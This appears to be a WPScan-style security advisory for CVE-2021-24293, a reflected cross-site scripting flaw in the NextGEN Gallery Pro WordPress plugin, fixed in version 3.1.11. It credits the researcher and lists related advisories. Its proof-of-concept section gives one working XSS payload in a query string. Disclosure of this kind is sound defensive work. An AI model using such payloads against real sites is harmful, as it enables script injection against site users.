NextGEN Gallery Pro < 3.1.11 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24293 | Plugin Vulnerabilities

Description

In the eCommerce module of NextGEN Gallery Pro, there is an action to call get_cart_items via photocrati_ajax , after that the settings[shipping_address][name] is able to inject malicious javascript.

Proof of Concept

On a page where a NextGEN (Pro) gallery is embed: ?photocrati_ajax=1&action=get_cart_items&cart=&settings[shipping_address][name]=a%3Cimg%20src=x%20onerror=alert('XSS')%3E

Affects Plugins

nextgen-gallery-pro

Fixed in 3.1.11

References

CVE

URL

https://www.imagely.com/wordpress-gallery-plugin/nextgen-pro/changelog/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

mgthuramoemyint

Submitter

ThuraMoeMyint

Submitter twitter

mgthuramoemyint

Verified

Yes

WPVDB ID

5e1a4725-3d20-44b0-8a35-bbf4263957f7

Timeline

Publicly Published

2021-02-24 (about 4 years ago)

Added

2021-02-24 (about 4 years ago)

Last Updated

2021-04-29 (about 4 years ago)

Other

Published

Title

Published

2024-05-31

Title

WP Logs Book <= 1.0.1 - Unauthenticated Stored XSS

Published

2023-01-24

Title

Easy Affiliate Links < 3.7.1 - Contributor+ Stored XSS

Published

2024-06-27

Title

Groundhogg < 3.4.3 - Reflected Cross-Site Scripting

Published

2022-03-14

Title

Mark Posts < 2.0.1 - Admin+ Stored Cross-Site Scripting

Published

2024-12-12

Title

Primer MyData for Woocommerce < 4.2.2 - Reflected Cross-Site Scripting